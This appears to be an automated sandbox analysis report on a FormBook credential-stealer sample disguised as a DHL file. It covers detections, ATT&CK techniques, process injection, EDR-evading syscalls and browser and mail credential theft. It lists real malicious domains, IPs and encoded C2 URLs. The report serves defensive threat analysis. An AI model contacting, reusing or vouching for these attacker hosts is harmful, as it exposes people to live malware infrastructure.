            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.1535088491.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3799070452.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3800835213.00000000027B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3803911358.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3807715876.0000000005620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1535865703.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3803937140.0000000004B20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1535411168.0000000003880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C76283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00C76283
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C76747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00C76747

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		2
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets151
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1570258 Sample: DHL 30312052024.exe Startdate: 06/12/2024 Architecture: WINDOWS Score: 100 28 www.joyesi.xyz 2->28 30 www.techchains.info 2->30 32 15 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus detection for URL or domain 2->46 50 6 other signatures 2->50 10 DHL 30312052024.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 FBboLdkGSWBoDSVHPM.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 netbtugc.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 FBboLdkGSWBoDSVHPM.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.rssnewscast.com 91.195.240.94, 49983, 49984, 49985 SEDO-ASDE Germany 22->34 36 elettrosistemista.zip 195.110.124.133, 49991, 49992, 49993 REGISTER-ASIT Italy 22->36 38 5 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            DHL 30312052024.exe50%ReversingLabsWin32.Trojan.AutoitInject
            DHL 30312052024.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.rssnewscast.com/fo8o/?LzY4r=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdN4JwRnXK0Z16Z0RVxT0NpaHfOGkEn8Q==&F6=SVfTP6Q02ra8s0100%Avira URL Cloudmalware
            http://www.3xfootball.com/fo8o/?F6=SVfTP6Q02ra8s0&LzY4r=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KtR967KJkZjHO4n68kz2fsmRVZ8Q==0%Avira URL Cloudsafe
            https://www.empowermedeco.com/fo8o/?LzY4r=mxnR0%Avira URL Cloudsafe
            http://www.elettrosistemista.zip/fo8o/?F6=SVfTP6Q02ra8s0&LzY4r=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMdSNhe6OmyHrxid8+dZ6jJ+tsZTLp5A==100%Avira URL Cloudmalware
            http://www.goldenjade-travel.com/fo8o/?F6=SVfTP6Q02ra8s0&LzY4r=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFgSElgiguhIU1cq+9C59UXHMaDdPWVQ==100%Avira URL Cloudmalware
            http://www.empowermedeco.com/fo8o/?LzY4r=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKJgdY6IPBFaQuYrbCSDzxJjPROalSnA==&F6=SVfTP6Q02ra8s00%Avira URL Cloudsafe
            http://www.magmadokum.com/fo8o/?F6=SVfTP6Q02ra8s0&LzY4r=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjckokWPFlpLgmRSSw2BhiETUwcdg1EQ==0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            elettrosistemista.zip
            		195.110.124.133
            		truefalse
              		high
              empowermedeco.com
              		217.196.55.202
              		truefalse
                		high
                www.3xfootball.com
                		154.215.72.110
                		truefalse
                  		high
                  s-part-0035.t-0009.t-msedge.net
                  		13.107.246.63
                  		truefalse
                    		high
                    www.goldenjade-travel.com
                    		116.50.37.244
                    		truefalse
                      		high
                      www.rssnewscast.com
                      		91.195.240.94
                      		truefalse
                        		high
                        www.techchains.info
                        		66.29.149.46
                        		truefalse
                          		high
                          natroredirect.natrocdn.com
                          		85.159.66.93
                          		truefalse
                            		high
                            www.magmadokum.com
                            		unknown
                            		unknownfalse
                              		high
                              www.donnavariedades.com
                              		unknown
                              		unknownfalse
                                		high
                                www.660danm.top
                                		unknown
                                		unknownfalse
                                  		high
                                  www.joyesi.xyz
                                  		unknown
                                  		unknownfalse
                                    		high
                                    www.liangyuen528.com
                                    		unknown
                                    		unknownfalse
                                      		high
                                      www.kasegitai.tokyo
                                      		unknown
                                      		unknownfalse
                                        		high
                                        www.empowermedeco.com
                                        		unknown
                                        		unknownfalse
                                          		high
                                          www.elettrosistemista.zip
                                          		unknown
                                          		unknownfalse
                                            		high
                                            www.antonio-vivaldi.mobi
                                            		unknown
                                            		unknownfalse
                                              		high

                                              Contacted URLs

                                              NameMaliciousAntivirus DetectionReputation
                                              http://www.empowermedeco.com/fo8o/false
                                                		high
                                                http://www.rssnewscast.com/fo8o/?LzY4r=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdN4JwRnXK0Z16Z0RVxT0NpaHfOGkEn8Q==&F6=SVfTP6Q02ra8s0true
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://www.magmadokum.com/fo8o/?F6=SVfTP6Q02ra8s0&LzY4r=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjckokWPFlpLgmRSSw2BhiETUwcdg1EQ==true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.elettrosistemista.zip/fo8o/false
                                                  		high
                                                  http://www.magmadokum.com/fo8o/false
                                                    		high
                                                    http://www.goldenjade-travel.com/fo8o/?F6=SVfTP6Q02ra8s0&LzY4r=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFgSElgiguhIU1cq+9C59UXHMaDdPWVQ==true
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.empowermedeco.com/fo8o/?LzY4r=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKJgdY6IPBFaQuYrbCSDzxJjPROalSnA==&F6=SVfTP6Q02ra8s0true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.rssnewscast.com/fo8o/false
                                                      		high
                                                      http://www.3xfootball.com/fo8o/?F6=SVfTP6Q02ra8s0&LzY4r=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KtR967KJkZjHO4n68kz2fsmRVZ8Q==true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.elettrosistemista.zip/fo8o/?F6=SVfTP6Q02ra8s0&LzY4r=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMdSNhe6OmyHrxid8+dZ6jJ+tsZTLp5A==true
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.goldenjade-travel.com/fo8o/false
                                                        		high
                                                        http://www.techchains.info/fo8o/false
                                                          		high

                                                          URLs from Memory and Binaries

                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://www.empowermedeco.com/fo8o/?LzY4r=mxnRnetbtugc.exe, 00000004.00000002.3807603495.000000000490A000.00000004.10000000.00040000.00000000.sdmp, FBboLdkGSWBoDSVHPM.exe, 00000006.00000002.3805604147.000000000471A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://duckduckgo.com/chrome_newtabnetbtugc.exe, 00000004.00000003.1727322738.000000000753E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://duckduckgo.com/ac/?q=netbtugc.exe, 00000004.00000003.1727322738.000000000753E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.iconetbtugc.exe, 00000004.00000003.1727322738.000000000753E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=netbtugc.exe, 00000004.00000003.1727322738.000000000753E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=netbtugc.exe, 00000004.00000003.1727322738.000000000753E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.empowermedeco.comFBboLdkGSWBoDSVHPM.exe, 00000006.00000002.3807715876.000000000569E000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.ecosia.org/newtab/netbtugc.exe, 00000004.00000003.1727322738.000000000753E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_netbtugc.exe, 00000004.00000002.3812272945.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3807603495.0000000003F9E000.00000004.10000000.00040000.00000000.sdmp, FBboLdkGSWBoDSVHPM.exe, 00000006.00000002.3805604147.0000000003DAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.sedo.com/services/parking.php3FBboLdkGSWBoDSVHPM.exe, 00000006.00000002.3805604147.0000000003DAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            		high
                                                                            https://ac.ecosia.org/autocomplete?q=netbtugc.exe, 00000004.00000003.1727322738.000000000753E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://codepen.io/uzcho_/pens/popular/?grid_type=listnetbtugc.exe, 00000004.00000002.3807603495.00000000042C2000.00000004.10000000.00040000.00000000.sdmp, FBboLdkGSWBoDSVHPM.exe, 00000006.00000002.3805604147.00000000040D2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                		high
                                                                                https://codepen.io/uzcho_/pen/eYdmdXw.cssnetbtugc.exe, 00000004.00000002.3807603495.00000000042C2000.00000004.10000000.00040000.00000000.sdmp, FBboLdkGSWBoDSVHPM.exe, 00000006.00000002.3805604147.00000000040D2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchnetbtugc.exe, 00000004.00000003.1727322738.000000000753E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=netbtugc.exe, 00000004.00000003.1727322738.000000000753E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high

                                                                                      World Map of Contacted IPs

                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs

                                                                                      Public IPs

                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      91.195.240.94
                                                                                      		www.rssnewscast.comGermany
                                                                                      		47846SEDO-ASDEfalse
                                                                                      154.215.72.110
                                                                                      		www.3xfootball.comSeychelles
                                                                                      		132839POWERLINE-AS-APPOWERLINEDATACENTERHKfalse
                                                                                      195.110.124.133
                                                                                      		elettrosistemista.zipItaly
                                                                                      		39729REGISTER-ASITfalse
                                                                                      116.50.37.244
                                                                                      		www.goldenjade-travel.comTaiwan; Republic of China (ROC)
                                                                                      		18046DONGFONG-TWDongFongTechnologyCoLtdTWfalse
                                                                                      85.159.66.93
                                                                                      		natroredirect.natrocdn.comTurkey
                                                                                      		34619CIZGITRfalse
                                                                                      66.29.149.46
                                                                                      		www.techchains.infoUnited States
                                                                                      		19538ADVANTAGECOMUSfalse
                                                                                      217.196.55.202
                                                                                      		empowermedeco.comNorway
                                                                                      		29300AS-DIRECTCONNECTNOfalse

                                                                                      General Information

                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                      Analysis ID:1570258
                                                                                      Start date and time:2024-12-06 17:42:13 +01:00
                                                                                      Joe Sandbox product:CloudBasic
                                                                                      Overall analysis duration:0h 10m 24s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:default.jbs
                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                      Number of analysed new started processes analysed:10
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:2
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Sample name:DHL 30312052024.exe
                                                                                      Detection:MAL
                                                                                      Classification:mal100.troj.spyw.evad.winEXE@7/3@13/7
                                                                                      EGA Information:
                                                                                      • Successful, ratio: 75%
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 91%
                                                                                      • Number of executed functions: 49
                                                                                      • Number of non-executed functions: 282
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .exe
                                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                      Warnings

                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                      • VT rate limit hit for: DHL 30312052024.exe

                                                                                      Simulations

                                                                                      Behavior and APIs

                                                                                      TimeTypeDescription
                                                                                      11:43:59API Interceptor10501787x Sleep call for process: netbtugc.exe modified

                                                                                      Joe Sandbox View / Context

                                                                                      IPs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      91.195.240.94CCE 30411252024.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.rssnewscast.com/fo8o/
                                                                                      Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.rssnewscast.com/fo8o/
                                                                                      Certificate 11-19AIS.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.rssnewscast.com/fo8o/
                                                                                      Certificate 11-21AIS.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.rssnewscast.com/fo8o/
                                                                                      Certificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.rssnewscast.com/fo8o/
                                                                                      Certificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.rssnewscast.com/fo8o/
                                                                                      Certificate 64411-18.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.rssnewscast.com/fo8o/
                                                                                      Certificate 11-17.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.rssnewscast.com/fo8o/
                                                                                      Certificate 11-142024.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.rssnewscast.com/fo8o/
                                                                                      rDocument11-142024.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.rssnewscast.com/fo8o/
                                                                                      154.215.72.110wOoESPII08.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.3xfootball.com/fo8o/?xVY=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KtR967KJkZjHO4n68kz2fsmRVZ8Q==&Nz=LPhpDRap3
                                                                                      N2sgk6jMa2.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.3xfootball.com/fo8o/?qD=FrMTb&aZ=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=
                                                                                      Document 151-512024.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.3xfootball.com/fo8o/?4h8=YPQX8Tch&FBEd=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzPSqftK5Z9AZjHO4n69vlG+dhBZ38Q==

                                                                                      Domains

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      www.3xfootball.comCCE 30411252024.exeGet hashmaliciousFormBookBrowse
                                                                                      • 154.215.72.110
                                                                                      Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                                      • 154.215.72.110
                                                                                      Certificate 11-19AIS.exeGet hashmaliciousFormBookBrowse
                                                                                      • 154.215.72.110
                                                                                      Certificate 11-21AIS.exeGet hashmaliciousFormBookBrowse
                                                                                      • 154.215.72.110
                                                                                      Certificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                                                                      • 154.215.72.110
                                                                                      Certificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                                                      • 154.215.72.110
                                                                                      Certificate 20156-2024.exeGet hashmaliciousFormBookBrowse
                                                                                      • 154.215.72.110
                                                                                      Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                                      • 154.215.72.110
                                                                                      RvJVMsNLJI.exeGet hashmaliciousFormBookBrowse
                                                                                      • 154.215.72.110
                                                                                      Certificate 64411-18.exeGet hashmaliciousFormBookBrowse
                                                                                      • 154.215.72.110

                                                                                      ASNs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      POWERLINE-AS-APPOWERLINEDATACENTERHKnshsh4.elfGet hashmaliciousMiraiBrowse
                                                                                      • 156.251.3.5
                                                                                      i586.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                      • 156.251.7.145
                                                                                      armv4l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                      • 156.244.234.130
                                                                                      ex86.elfGet hashmaliciousMiraiBrowse
                                                                                      • 156.244.234.110
                                                                                      armv6l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                      • 156.242.206.57
                                                                                      mipsel.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                      • 156.251.7.126
                                                                                      ek8LkB2Cgo.exeGet hashmaliciousFormBookBrowse
                                                                                      • 156.251.17.224
                                                                                      PO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                                                      • 156.251.17.224
                                                                                      m68k.elfGet hashmaliciousMiraiBrowse
                                                                                      • 156.242.206.20
                                                                                      xd.spc.elfGet hashmaliciousMiraiBrowse
                                                                                      • 154.201.38.133
                                                                                      REGISTER-ASITSRT68.exeGet hashmaliciousFormBookBrowse
                                                                                      • 195.110.124.133
                                                                                      CCE 30411252024.exeGet hashmaliciousFormBookBrowse
                                                                                      • 195.110.124.133
                                                                                      ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                      • 195.110.124.133
                                                                                      Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                                      • 195.110.124.133
                                                                                      Certificate 11-19AIS.exeGet hashmaliciousFormBookBrowse
                                                                                      • 195.110.124.133
                                                                                      DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                      • 195.110.124.133
                                                                                      ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                      • 195.110.124.133
                                                                                      S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                      • 195.110.124.133
                                                                                      Certificate 11-21AIS.exeGet hashmaliciousFormBookBrowse
                                                                                      • 195.110.124.133
                                                                                      Certificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                                                                      • 195.110.124.133
                                                                                      SEDO-ASDECCE 30411252024.exeGet hashmaliciousFormBookBrowse
                                                                                      • 91.195.240.94
                                                                                      Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                                      • 91.195.240.94
                                                                                      Certificate 11-19AIS.exeGet hashmaliciousFormBookBrowse
                                                                                      • 91.195.240.94
                                                                                      Certificate 11-21AIS.exeGet hashmaliciousFormBookBrowse
                                                                                      • 91.195.240.94
                                                                                      Certificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                                                                      • 91.195.240.94
                                                                                      Certificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                                                      • 91.195.240.94
                                                                                      Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                                      • 91.195.240.94
                                                                                      RvJVMsNLJI.exeGet hashmaliciousFormBookBrowse
                                                                                      • 91.195.240.94
                                                                                      Certificate 64411-18.exeGet hashmaliciousFormBookBrowse
                                                                                      • 91.195.240.94
                                                                                      Certificate 11-17.exeGet hashmaliciousFormBookBrowse
                                                                                      • 91.195.240.94

                                                                                      JA3 Fingerprints

                                                                                      No context

                                                                                      Dropped Files

                                                                                      No context

                                                                                      Created / dropped Files

                                                                                      C:\Users\user\AppData\Local\Temp\F56GKLK7U4

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\netbtugc.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                      Category:dropped
                                                                                      Size (bytes):196608
                                                                                      Entropy (8bit):1.1221538113908904
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
                                                                                      MD5:C1AE02DC8BFF5DD65491BF71C0B740A7
                                                                                      SHA1:6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
                                                                                      SHA-256:CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
                                                                                      SHA-512:01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
                                                                                      Malicious:false
                                                                                      Reputation:moderate, very likely benign file
                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\autF93E.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\DHL 30312052024.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):270848
                                                                                      Entropy (8bit):7.993413433199171
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:fsoRQt12GWUqr1E4tECDm4tm//ugAZwGtS2uw8KWz3nict:fHuQDGCD7E/iDuwpeht
                                                                                      MD5:F7AC0B63E89E78C46408AAA010A6B30C
                                                                                      SHA1:AC3B177598BFF46B4276D436BABB86B79F18439A
                                                                                      SHA-256:16E2B22C2B9BA7E8CD830704110E4AE782989C1357C857BD690B27C949D502E3
                                                                                      SHA-512:0E4CB286A662737D30B090C689D522FF2975E7FDCBE6AAD6DDCCE5B6AFAEA9661DD2263151A95375EB0C08424CE25BF86C1BE68B9617D6ABC7F78B15D0EA4219
                                                                                      Malicious:false
                                                                                      Reputation:low
